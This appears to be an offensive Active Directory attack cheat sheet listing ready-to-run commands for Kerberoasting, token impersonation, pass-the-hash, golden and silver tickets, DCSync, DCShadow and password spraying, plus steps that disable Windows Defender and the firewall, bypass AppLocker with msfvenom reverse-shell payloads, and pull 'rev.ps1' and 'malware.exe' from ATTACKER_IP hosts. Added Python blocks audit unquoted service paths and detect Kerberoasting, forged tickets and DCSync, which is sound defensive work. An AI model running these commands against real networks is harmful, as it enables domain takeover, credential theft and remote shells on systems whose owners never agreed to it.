Active Directory privilege escalation cheat sheet


Recon

  • # Systeminfo
  • systeminfo
  • hostname
  • # Especially good with hotfix info
  • wmic qfe get Caption,Description,HotFixID,InstalledOn
  • # What users/localgroups are on the machine?
  • net users
  • net localgroups
  • net localgroup Administrators
  • net user morph3
  • # Crosscheck local and domain too
  • net user morph3 /domain
  • net group Administrators /domain
  • # Network information
  • ipconfig /all
  • route print
  • arp -A
  • # To see what tokens we have
  • whoami /priv
  • # Recursive string scan
  • findstr /spin "password" *.*
  • # Running processes
  • tasklist /SVC
  • # Network connections
  • netstat -ano
  • # Search for writeable directories
  • dir /a-r-d /s /b
  • ### Some good one-liners
  • # Obtain the path of the executable called by a Windows service (good for checking unquoted paths):
  • sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @echo --------- & @sc qc %i | findstr "BINARY_PATH_NAME" & @echo.) & del a 2>nul & del b 2>nul

Elevation of Privileges

     General

  • # PowerShellMafia
  • # Always use the dev branch; the others are shit.
  • https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
  • powershell.exe -c "Import-Module C:\Users\Public\PowerUp.ps1; Invoke-AllChecks"
  • powershell.exe -c "Import-Module C:\Users\Public\Get-System.ps1; Get-System"
  • # Sherlock
  • https://github.com/rasta-mouse/Sherlock
  • # Unquoted paths (auto-start services outside C:\Windows whose binary path is not quoted)
  • wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
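The two unquoted-path one-liners on this page (the sc query loop under Recon and the wmic | findstr chain above) encode one condition: an auto-start service whose binary path contains spaces, is not quoted and does not live under C:\Windows. The Python below is an added audit that makes that condition explicit and also produces the remediated, quoted PathName; it is not code from the original page or from PowerUp. It reads the `/format:list` form of `wmic service get name,pathname,startmode`; the sample output, service names and paths are constructed.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample in `wmic service get name,pathname,startmode /format:list`
# form. Service names and paths are hypothetical, not output from a real host.
SAMPLE_WMIC_LIST = """\
Name=Spooler
PathName=C:\\Windows\\System32\\spoolsv.exe
StartMode=Auto

Name=AcmeAgent
PathName=C:\\Program Files\\Acme Corp\\Agent\\agent.exe /svc
StartMode=Auto

Name=AcmeBackup
PathName="C:\\Program Files\\Acme Corp\\Backup\\backup.exe" -run
StartMode=Auto

Name=LegacyTool
PathName=C:\\Tools\\Legacy Tool\\tool.exe
StartMode=Manual
"""

EXE_RE = re.compile(r"\.exe", re.IGNORECASE)


def parse_wmic_list(text: str) -> List[Dict[str, str]]:
    """Parse /format:list output: key=value lines, records separated by blank lines."""
    records: List[Dict[str, str]] = []
    current: Dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            if current:
                records.append(current)
                current = {}
            continue
        key, _, value = line.partition("=")
        current[key] = value
    if current:
        records.append(current)
    return records


def split_binary(pathname: str) -> Tuple[str, str]:
    """Split an ImagePath into (binary, arguments).

    A leading quote means the binary ends at the closing quote; otherwise the
    binary runs up to the first '.exe' and everything after it is arguments.
    """
    if pathname.startswith('"'):
        end = pathname.find('"', 1)
        return pathname[1:end], pathname[end + 1:].strip()
    match = EXE_RE.search(pathname)
    if not match:
        return pathname, ""
    return pathname[:match.end()], pathname[match.end():].strip()


def is_unquoted_risky(pathname: str, startmode: str) -> bool:
    """Same condition as the wmic|findstr one-liner: auto-start, unquoted,
    binary path contains a space, and not under C:\\Windows."""
    if startmode.lower() != "auto" or pathname.startswith('"'):
        return False
    binary, _ = split_binary(pathname)
    if binary.lower().startswith("c:\\windows\\"):
        return False
    return " " in binary


def find_unquoted_services(text: str) -> List[Tuple[str, str]]:
    """Return (service name, PathName) for every risky service in the wmic output."""
    return [
        (rec["Name"], rec["PathName"])
        for rec in parse_wmic_list(text)
        if is_unquoted_risky(rec.get("PathName", ""), rec.get("StartMode", ""))
    ]


def quoted_binpath(pathname: str) -> str:
    """Remediation: the same ImagePath with the binary quoted, which is the
    value to set with `sc config <service> binPath= ...`."""
    binary, args = split_binary(pathname)
    return f'"{binary}" {args}'.rstrip()


if __name__ == "__main__":
    for name, path in find_unquoted_services(SAMPLE_WMIC_LIST):
        print(f"{name}: {path}")
        print(f"  remediated PathName: {quoted_binpath(path)}")
```

The C:\Windows exclusion mirrors the one-liner; a stricter audit would drop it and instead check the ACLs of every intermediate directory, since only a writable directory on the path makes an unquoted service exploitable.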

     Kerberoast

The logic behind Kerberoasting is simple: request service tickets and crack them offline (the cracking itself produces no logs on the target).
- For Kerberos to work, the clocks of attacker and victim must be within 5 minutes of each other.

  • # Rubeus
  • .\Rubeus.exe kerberoast /creduser:ecorp\morph3 /credpassword:pass1234
  • # List available tickets
  • setspn.exe -t evil.corp -q */*
  • powershell.exe -exec bypass -c "Import-Module .\GetUserSPNs.ps1"
  • cscript.exe GetUserSPNs.vbs
  • # List cached tickets
  • Invoke-Mimikatz -Command '"kerberos::list"'
  • powershell.exe -c "klist"
  • powershell.exe -c "Import-Module C:\Users\Public\Invoke-Mimikatz.ps1; Invoke-Mimikatz -Command '\"kerberos::list\"'"
  • # Request tickets
  • Add-Type -AssemblyName System.IdentityModel
  • New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"
  • # Requesting remotely
  • python GetUserSPNs.py -request ECORP/morph3:supersecurepassword@127.0.0.1
  • # Extract tickets
  • powershell.exe -c "Import-Module C:\Users\Public\Invoke-Kerberoast.ps1; Invoke-Kerberoast -OutputFormat Hashcat"
  • Invoke-Mimikatz -Command '"kerberos::list /export"'
  • # Crack Tickets
  • python tgsrepcrack.py /usr/share/wordlists/rockyou.txt ticket.kirbi
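The cracking is offline, but every service ticket requested above is logged by the domain controller as event 4769, and RC4-HMAC tickets (encryption type 0x17) are the ones that crack fastest. The classic indicator is therefore one account requesting RC4 service tickets for many distinct service accounts in a short window. The Python below is an added detection example, not code from the original page or from any of the tools it lists; the 4769 records are constructed and reduced to the relevant fields, and the account and service names are hypothetical.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

RC4_HMAC = "0x17"                      # TicketEncryptionType for RC4-HMAC (AES is 0x11/0x12)
DEFAULT_THRESHOLD = 5                  # distinct service accounts requested ...
DEFAULT_WINDOW = timedelta(minutes=5)  # ... within this window


def make_event(time, account, service, enc, client="10.0.0.50", status="0x0"):
    """One 4769 record reduced to the fields the detection needs
    (TargetUserName, ServiceName, TicketEncryptionType, IpAddress, Status)."""
    return {"time": time, "account": account, "service": service,
            "enc": enc, "client": client, "status": status}


# Constructed 4769 events: hypothetical accounts, service names and addresses.
SAMPLE_4769 = [
    make_event("2020-03-09T10:00:01", "morph3@EVIL.CORP", "svc_http", "0x17"),
    make_event("2020-03-09T10:00:02", "morph3@EVIL.CORP", "svc_mssql", "0x17"),
    make_event("2020-03-09T10:00:03", "morph3@EVIL.CORP", "svc_ftp", "0x17"),
    make_event("2020-03-09T10:00:04", "morph3@EVIL.CORP", "svc_share", "0x17"),
    make_event("2020-03-09T10:00:05", "morph3@EVIL.CORP", "svc_backup", "0x17"),
    make_event("2020-03-09T10:00:06", "morph3@EVIL.CORP", "WKS02$", "0x17"),    # computer account: ignored
    make_event("2020-03-09T10:00:07", "morph3@EVIL.CORP", "krbtgt", "0x17"),    # krbtgt: not a roastable service
    make_event("2020-03-09T10:01:00", "WKS01$@EVIL.CORP", "svc_http", "0x12"),  # AES ticket: normal traffic
    make_event("2020-03-09T10:02:00", "jdoe@EVIL.CORP", "svc_mssql", "0x17"),   # one RC4 request: below threshold
    make_event("2020-03-09T11:30:00", "jdoe@EVIL.CORP", "svc_http", "0x17"),
]


def is_rc4_service_request(ev: Dict[str, str]) -> bool:
    """A successful RC4 TGS request for a user (non-computer, non-krbtgt) service account."""
    service = ev["service"]
    return (ev["enc"].lower() == RC4_HMAC
            and ev["status"] == "0x0"
            and not service.endswith("$")
            and service.lower() != "krbtgt")


def detect_kerberoast(events, threshold=DEFAULT_THRESHOLD,
                      window=DEFAULT_WINDOW) -> Dict[str, List[str]]:
    """Return {account: [service accounts]} for every requester that asked for
    `threshold` or more distinct RC4 service tickets inside one `window`."""
    by_account = defaultdict(list)
    for ev in events:
        if is_rc4_service_request(ev):
            by_account[ev["account"]].append(
                (datetime.fromisoformat(ev["time"]), ev["service"]))
    alerts: Dict[str, List[str]] = {}
    for account, requests in by_account.items():
        requests.sort()
        start = 0
        for end in range(len(requests)):
            # slide the window start forward until it spans at most `window`
            while requests[end][0] - requests[start][0] > window:
                start += 1
            services = {svc for _, svc in requests[start:end + 1]}
            if len(services) >= threshold:
                alerts[account] = sorted(services)
    return alerts


if __name__ == "__main__":
    for account, services in detect_kerberoast(SAMPLE_4769).items():
        print(f"{account} requested RC4 tickets for {len(services)} services: {', '.join(services)}")
```

Legacy services that only support RC4 are the main source of noise for this rule; the matching mitigation is on the service-account side: AES-only msDS-SupportedEncryptionTypes, group managed service accounts or long random passwords, so that a captured ticket is not crackable in the first place.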

     Juicy Potato

https://github.com/ohpe/juicy-potato/releases
Pick one CLSID from here according to your system
https://github.com/ohpe/juicy-potato/tree/master/CLSID
Required privileges:

SeAssignPrimaryTokenPrivilege

SeImpersonatePrivilege

  • C:\Windows\Temp\JuicyPotato.exe -p cmd.exe -a "/c whoami > C:\Users\Public\morph3.txt" -t * -l 1031 -c {d20a3293-3341-4ae8-9aaf-8e397cb63c34}

      Stored Credential

  • # To check if there are any stored credentials
  • cmdkey /list
  • # Using them
  • runas /user:administrator /savecred "cmd.exe /k whoami"

      Impersonating Tokens with meterpreter

  1. use incognito
  2. list_tokens -u
  3. impersonate_token NT-AUTHORITY\System

Lateral Movement

PsExec, SmbExec, WMIExec, RDP, PTH in general.
WinRM is always good. Check groups carefully.
Since Windows now ships OpenSSH, SSH should be considered as well.

     Mimikatz Ticket PTH

  1. Enable-PSRemoting
  2. mimikatz.exe "kerberos::ptt C:\Users\Public\ticketname.kirbi" "exit"
  3. Enter-PSSession -ComputerName ECORP

     WinRM

  • $pass = ConvertTo-SecureString 'supersecurepassword' -AsPlainText -Force
  • $cred = New-Object System.Management.Automation.PSCredential ('ECORP.local\morph3', $pass)
  • Invoke-Command -ComputerName DC -Credential $cred -ScriptBlock { whoami }
  • # Evil-WinRM
  • https://github.com/Hackplayers/evil-winrm
  • ruby evil-winrm.rb -i 192.168.1.2 -u morph3 -p morph3 -r evil.corp

     PTH with Mimikatz

  1. Invoke-Mimikatz -Command '"sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:command"'

     Database Links

  • # PowerUpSQL
  • https://github.com/NetSPI/PowerUpSQL
  • Get-SQLServerLink -Instance server -Verbose
  • powershell.exe -c "Import-Module C:\Users\Public\PowerUpSQL.ps1; Invoke-SQLEscalatePriv -Verbose -Instance ECORP\sql"
  • # To see servers
  • select srvname from master..sysservers;
  • # Native
  • Get-SQLServerLinkCrawl -Instance server -Query "exec master..xp_cmdshell 'whoami'"
  • # Linked database tables
  • select * from openquery("ECORP\FOO", 'select TABLE_NAME from FOO.INFORMATION_SCHEMA.TABLES')
  • # You can also use the metasploit module exploit/windows/mssql/mssql_linkcrawler
  • # With that module you can find linked databases and whether you are admin on them
  • # You can run a query and try to enable xp_cmdshell on that server
  • select * from openquery("server", 'select * from master..sysservers')
  • # Optionally impersonate another user first, then enable xp_cmdshell on the linked server
  • EXECUTE AS USER = 'internal_user'
  • EXECUTE ('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT "server"

Golden and Silver Tickets

The key depends on the ticket type:
-> for a Golden Ticket, it is the krbtgt account's key;
-> for a Silver Ticket, it is the key of the "computer account" or "service account".

  • # Golden Ticket
  • # Extract the hash of the krbtgt user
  • lsadump::dcsync /domain:evil.corp /user:krbtgt
  • lsadump::lsa /inject
  • lsadump::lsa /patch
  • lsadump::trust /patch
  • # creating the ticket
  • # /rc4 or /krbtgt - the NTLM hash
  • # /sid you will get this from krbtgt dump
  • # /ticket parameter is optional but default is ticket.kirbi
  • # /groups parameter is optional but default is 513,512,520,518,519
  • # /id you can fake users and supply valid Administrator id
  • kerberos::golden /user:morph3 /domain:evil.corp /sid:domains-sid /krbtgt:krbtgt-hash /ticket:ticket.kirbi /groups:501,502,513,512,520,518,519
  • kerberos::ptt ticket.kirbi # you can also add /ptt to the kerberos::golden command
  • # After this, the final ticket should be ready
  • # You can now verify that your ticket is in the cache
  • powershell.exe -c "klist"
  • # Verify that golden ticket is working
  • dir \\DC\C$
  • psexec.exe \\DC cmd.exe
  • # Purge the currently cached kerberos ticket
  • kerberos::purge
  • #metasploit module can also be used for golden ticket, it loads the ticket into given session
  • post/windows/escalate/golden_ticket
  • # Silver Ticket
  • # Silver Ticket allows escalation of privileges on the DC
  • # /target - the server/computer name where the service is hosted (ex: share.server.local, sql.server.local:1433, ...)
  • # /service – The service name for the ticket (ex: cifs, rpcss, http, mssql, …)
  • # Examples
  • kerberos::golden /user:morph3 /domain:domain /sid:domain-sid /target:evilcorp-sql102.evilcorp.local:1433 /service:MSSQLSvc /rc4:service-hash /ptt /id:1103
  • sqlcmd -S evilcorp-sql102.evilcorp.local
  • select SYSTEM_USER;
  • GO
  • kerberos::golden /user:JohnDoe /id:500 /domain:targetdomain.com /sid:S-1-5-21-1234567890-123456789-1234567890 /target:targetserver.targetdomain.com /rc4:d7e2b80507ea074ad59f152a1ba20458 /service:cifs /ptt
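A forged ticket sitting in the cache looks different from one a KDC issued: kerberos::golden defaults to a 10-year lifetime where the Default Domain Policy caps a TGT at 10 hours, a ticket built from an /rc4 key is RC4 where the domain otherwise negotiates AES, and a ticket injected with kerberos::ptt was never fetched from a KDC, so klist shows an empty "Kdc Called" field (a heuristic, not a guarantee). The Python below is an added example that audits klist output for those three indicators; it is not part of the original page, and the klist output it parses is constructed for a hypothetical EVIL.CORP domain.

```python
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed `klist` output: ticket #0 is what an injected golden ticket tends
# to look like, ticket #1 a normal service ticket. Names and hosts are hypothetical.
SAMPLE_KLIST = """\
Current LogonId is 0:0x3e7a1

Cached Tickets: (2)

#0>     Client: morph3 @ EVIL.CORP
        Server: krbtgt/EVIL.CORP @ EVIL.CORP
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
        Start Time: 3/9/2020 10:00:00 (local)
        End Time:   3/9/2030 10:00:00 (local)
        Renew Time: 3/9/2030 10:00:00 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

#1>     Client: jdoe @ EVIL.CORP
        Server: cifs/fs01.evil.corp @ EVIL.CORP
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
        Start Time: 3/9/2020 10:05:00 (local)
        End Time:   3/9/2020 20:00:00 (local)
        Renew Time: 3/16/2020 10:05:00 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called: dc01.evil.corp
"""

LIFETIME_EXCEEDS_POLICY = "lifetime_exceeds_policy"
RC4_ENCRYPTION = "rc4_encryption"
NO_KDC_CALLED = "no_kdc_called"

DEFAULT_MAX_TGT_LIFETIME = timedelta(hours=10)  # Default Domain Policy value


def parse_klist(text: str) -> List[Dict[str, str]]:
    """Split klist output into one {field: value} dict per '#N>' ticket block."""
    tickets: List[Dict[str, str]] = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("#"):              # "#0>     Client: ..." starts a ticket
            if current:
                tickets.append(current)
            current = {}
            line = line.split(">", 1)[1].strip()
        if current is None or not line:       # header lines before the first ticket
            continue
        key, sep, value = line.partition(":")
        if sep:                               # "Ticket Flags 0x... -> ..." has no colon; skipped
            current[key.strip()] = value.strip()
    if current:
        tickets.append(current)
    return tickets


def parse_klist_time(value: str) -> datetime:
    """'3/9/2020 10:00:00 (local)' -> datetime; the '(local)' suffix is dropped."""
    return datetime.strptime(value.split(" (")[0], "%m/%d/%Y %H:%M:%S")


def audit_ticket(ticket: Dict[str, str],
                 max_lifetime: timedelta = DEFAULT_MAX_TGT_LIFETIME) -> List[str]:
    """Return the indicator labels that apply to one parsed ticket."""
    findings = []
    start = parse_klist_time(ticket["Start Time"])
    end = parse_klist_time(ticket["End Time"])
    if end - start > max_lifetime:
        findings.append(LIFETIME_EXCEEDS_POLICY)
    if "RC4" in ticket.get("KerbTicket Encryption Type", "").upper():
        findings.append(RC4_ENCRYPTION)
    if not ticket.get("Kdc Called"):
        findings.append(NO_KDC_CALLED)
    return findings


def audit_klist(text: str,
                max_lifetime: timedelta = DEFAULT_MAX_TGT_LIFETIME) -> Dict[str, List[str]]:
    """{Server: [indicators]} for every cached ticket with at least one indicator."""
    results: Dict[str, List[str]] = {}
    for ticket in parse_klist(text):
        findings = audit_ticket(ticket, max_lifetime)
        if findings:
            results[ticket["Server"]] = findings
    return results


if __name__ == "__main__":
    for server, findings in audit_klist(SAMPLE_KLIST).items():
        print(f"{server}: {', '.join(findings)}")
```

On the DC side the matching controls are the ones this page's commands imply: rotate the krbtgt password twice after any suspected compromise (the old key stays valid for one rotation), and alert on 4769/4624 events whose account name does not resolve to an existing user, since a golden ticket can name any /user.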

AD Attacks

     Enumeration

  1. # Basic ldap enumeration
  2. enum4linux -a 192.168.1.2
  3. python windapsearch.py -u morph3 -p morph3 -d evil.corp --dc-ip 192.168.1.2
  4. python ad-ldap-enum.py -d contoso.com -l 10.0.0.1 -u Administrator -p P@ssw0rd

     Bruteforce on ldap

  • # Password spray
  • https://github.com/dafthack/DomainPasswordSpray
  • Import-Module .\DomainPasswordSpray.ps1
  • Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
  • # Password brute
  • ./kerbrute_linux_amd64 bruteuser -d evil.corp --dc 192.168.1.2 rockyou.txt morph3
  • # Username brute
  • ./kerbrute_linux_amd64 userenum -d evil.corp --dc 192.168.1.2 users.txt
  • # Password spray
  • ./kerbrute_linux_amd64 passwordspray -d evil.corp --dc 192.168.1.2 users.txt rockyou.txt

     DC Shadow


The DCShadow attack registers a rogue Domain Controller in the AD infrastructure so that changes can be pushed into the directory and the real AD members dumped afterwards.

  • # Find the SID of that user
  • wmic useraccount where (name='administrator' and domain='%userdomain%') get name,sid
  • # This creates an RPC server and listens
  • lsadump::dcshadow /object:"CN=morph3,OU=Business,OU=Users,OU=ECORP,DC=ECORP,DC=local" /attribute:sidhistory /value:sid
  • # Run this from another mimikatz
  • lsadump::dcshadow /push
  • # After this unregistration must be done
  • # Relogin
  • lsadump::dcsync /domain:ECORP.local /account:krbtgt
  • # Now you must have krbtgt hash
  • https://attack.stealthbits.com/how-dcshadow-persistence-attack-works

     DC Sync

  • #####
  • lsadump::dcsync /domain:domain /all /csv
  • lsadump::dcsync /user:krbtgt
  • #####
  • https://gist.github.com/monoxgas/9d238accd969550136db
  • powershell.exe -c "Import-Module .\Invoke-DCSync.ps1; Invoke-DCSync -PWDumpFormat"
  • #####
  • python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1
  • python secretsdump.py -system /tmp/SYSTEM -ntds /tmp/ntds.dit LOCAL
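DCSync works by asking a domain controller for directory replication, and the DC audits that request as event 4662 with the replication control-access rights in its Properties field: DS-Replication-Get-Changes (1131f6aa-9c07-11d1-f79f-00c04fc2dcd2), DS-Replication-Get-Changes-All (1131f6ad-9c07-11d1-f79f-00c04fc2dcd2) and DS-Replication-Get-Changes-In-Filtered-Set (89e95b76-444d-4c62-991a-0facbeda640c). Only domain controllers (and, in hybrid environments, the Azure AD Connect account) should exercise those rights, so any other subject is worth an alert. The Python below is an added example, not code from the page or from impacket or mimikatz; the 4662 records and the DC allowlist are constructed.

```python
import re
from typing import Dict, Iterable, List

# Control-access right GUIDs that authorize directory replication (what DCSync needs).
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET = "89e95b76-444d-4c62-991a-0facbeda640c"
REPLICATION_RIGHTS = {
    DS_REPLICATION_GET_CHANGES,
    DS_REPLICATION_GET_CHANGES_ALL,
    DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET,
}

GUID_RE = re.compile(
    r"\{?([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\}?", re.I)

# Constructed allowlist: the DC machine accounts of a hypothetical EVIL.CORP domain.
KNOWN_DC_ACCOUNTS = {"DC01$", "DC02$"}

# Constructed 4662 records reduced to SubjectUserName, ObjectName and the
# Properties text (one GUID per line, as the event renders it).
SAMPLE_4662 = [
    {"subject": "DC02$", "object": "DC=evil,DC=corp",
     "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"subject": "morph3", "object": "DC=evil,DC=corp",
     "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"subject": "jdoe", "object": "CN=jdoe,CN=Users,DC=evil,DC=corp",
     "properties": "{0f00a1b2-0000-4000-8000-000000000001}"},  # unrelated property GUID (constructed)
]


def replication_rights(properties: str) -> List[str]:
    """The replication right GUIDs present in a 4662 Properties field, sorted."""
    found = {guid.lower() for guid in GUID_RE.findall(properties)}
    return sorted(found & REPLICATION_RIGHTS)


def detect_dcsync(events: Iterable[Dict[str, str]], dc_accounts: Iterable[str]) -> List[Dict]:
    """Replication-right accesses by any subject that is not an allowlisted DC account."""
    allow = {account.upper() for account in dc_accounts}
    alerts = []
    for ev in events:
        rights = replication_rights(ev["properties"])
        if rights and ev["subject"].upper() not in allow:
            alerts.append({"subject": ev["subject"], "object": ev["object"], "rights": rights})
    return alerts


if __name__ == "__main__":
    for hit in detect_dcsync(SAMPLE_4662, KNOWN_DC_ACCOUNTS):
        print(f"{hit['subject']} replicated {hit['object']} with {', '.join(hit['rights'])}")
```

Event 4662 is only written when the Directory Service Access audit subcategory is enabled and the domain object's SACL audits control access, so the rule is silent on a DC without that audit policy. The companion preventive check is to enumerate who actually holds these three rights on the domain head and remove everything that is not a DC or a known sync account.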

Bypass-Evasion Techniques

     Powershell Constrained Language Bypass

  1. powershell.exe -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')"
  2. PSByPassCLM
  3. powershell.exe -exec bypass -c

     Windows Defender

  1. sc config WinDefend start= disabled
  2. sc stop WinDefend
  3. # Powershell
  4. Set-MpPreference -DisableRealtimeMonitoring $true
  5. # Remove definitions
  6. "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

     Firewall

  1. Netsh Advfirewall show allprofiles
  2. NetSh Advfirewall set allprofiles state off

     Ip Whitelisting

  1. New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress ATTACKER_IP

     Applocker ByPass

  1. https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md
  2. https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md
  3. https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md
  4. # Multistep process to bypass applocker via MSBuild.exe:
  5. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.56 LPORT=9001  -f csharp -e x86/shikata_ga_nai -i  > out.cs
  6. # Replace the buf-sc and save it as out.csproj
  7. https://raw.githubusercontent.com/3gstudent/msbuild-inline-task/master/executes%20shellcode.xml
  8. Invoke-WebRequest “http://ATTACKER_IP/payload.csproj” -OutFile “out.csproj”; C:\windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe .\out.csproj
  9. # or you can simply use my tool 🙂
  10. https://github.com/morph3/Msbuild-payload-generator
  11. sudo python msbuild_gen.py -a x86 -i 10 --lhost 192.168.220.130 --lport 9001 -m

     GreatSCT

  1. # This also needs Veil-Framework
  2. python GreatSCT.py --ip 192.168.1.56 --port 443 -t Bypass -p installutil/powershell/script.py -c "OBFUSCATION=ascii SCRIPT=/root/script.ps1"
  3. C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false payload1.exe
  4. python3 GreatSCT.py -t Bypass -p regasm/meterpreter/rev_tcp --ip 192.168.1.56 --port 9001
  5. C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U payload.dll

     EvilSalsa

  1. #Preparing payloads
  2. python EncrypterAssembly/encrypterassembly.py EvilSalsa.dll supersecretpass123 evilsalsa.dll.txt
  3. EncrypterAssembly.exe EvilSalsa.dll supersecretpass123 evilsalsa.dll.txt
  4. #Executing payload
  5. SalseoLoader.exe password http://ATTACKER_IP/evilsalsa.dll.txt reversetcp ATTACKER_IP 9001
  6. # Reverse icmp shell
  7. python icmpsh_m.py "ATTACKER_IP" "VICTIM_IP"
  8. SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp ATTACKER_IP

Miscellaneous

     Changing Permissions of a file

  1. icacls text.txt /grant Everyone:F

     Downloading files

  1. IEX (New-Object System.Net.WebClient).DownloadString("http://ATTACKER_IP/rev.ps1")
  2. (New-Object System.Net.WebClient).DownloadFile("http://ATTACKER_SERVER/malware.exe", "C:\Windows\Temp\malware.exe")
  3. Invoke-WebRequest "http://ATTACKER_SERVER/malware.exe" -OutFile "C:\Windows\Temp\malware.exe"
  4. certutil.exe -urlcache -split -f "http://127.0.0.1:80/shell.exe" shell.exe

     Adding user to Domain admins

  1. Add-DomainGroupMember -Identity 'Domain Admins' -Members morph3 -Verbose

      Base64 Encode-Decode

  1. certutil -decode foo.b64 foo.exe
  2. certutil -encode foo.exe foo.b64

      Network sharing

  1. # Local share
  2. net share
  3. wmic share get /format:list
  4. # Remote share
  5. net view
  6. net view \\dc.ecorp.foo /all
  7. wmic /node:dc.ecorp.foo share get
  8. # Mounting share
  9. net use Z: \\127.0.0.1\C$ /user:morph3 password123

      Port Forwarding

  1. # Port forward using plink
  2. plink.exe -l morph3 -pw pass123 192.168.1.56 -R 8080:127.0.0.1:8080
  3. # Port forward using meterpreter
  4. portfwd add -l attacker-port -p victim-port -r victim-ip
  5. portfwd add -l 3306 -p 3306 -r 192.168.1.56

      Powershell Portscan

  1. 0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect("VICTIM_IP",$_)) "Port $_ is open!"} 2>$null

      Recovering Powershell Secure String

  1. ######
  2. $user = "morph3"
  3. $file = "morph3-pass.xml"
  4. $cred= New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user, (Get-Content $file | ConvertTo-SecureString)
  5. Invoke-Command -ComputerName ECORP -Credential $cred -Authentication credssp -ScriptBlock { whoami }
  6. ######
  7. [System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($secureString))
  8. ######
  9. $Ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToCoTaskMemUnicode($password)
  10. $result = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($Ptr)
  11. [System.Runtime.InteropServices.Marshal]::ZeroFreeCoTaskMemUnicode($Ptr)
  12. $result

      Injecting PowerShell scripts Into sessions

  1. Invoke-Command -FilePath scriptname -Session $sessions
  2. Enter-PSSession -Session $sess

      Enable RDP

  1. # CMD
  2. reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
  3. # Powershell
  4. Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0
  5. Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
  6. # Optional
  7. net localgroup "Remote Desktop Users" morph3 /add
  8. # Re-enabling the firewall rules
  9. netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
  10. netsh advfirewall firewall add rule name="allow RemoteDesktop" dir=in protocol=TCP localport=3389 action=allow

      Decrypting EFS files with Mimikatz

Follow the link here How to Decrypt EFS Files

  1. privilege::debug
  2. token::elevate
  3. crypto::system /file:"C:\Users\Administrator\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\thecert" /export
  4. dpapi::capi /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\SID\id"
  5. # Clear text password
  6. dpapi::masterkey /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\SID\masterkey" /password:pass123
  7. # After this command you must have the exported .der and .pvk files
  8. dpapi::capi /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\SID\id" /masterkey:f2c9ea33a990c865e985c496fb8915445895d80b
  9. openssl x509 -inform DER -outform PEM -in blah.der -out public.pem
  10. openssl rsa -inform PVK -outform PEM -in blah.pvk -out private.pem
  11. openssl pkcs12 -in public.pem -inkey private.pem -password pass:randompass -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
  12. # Import the certificate
  13. certutil -user -p randompass -importpfx cert.pfx NoChain,NoRoot
  14. type "C:\Users\Administrator\Documents\encrypted.txt"

Post exploitation – information gathering

      Reading Event Logs

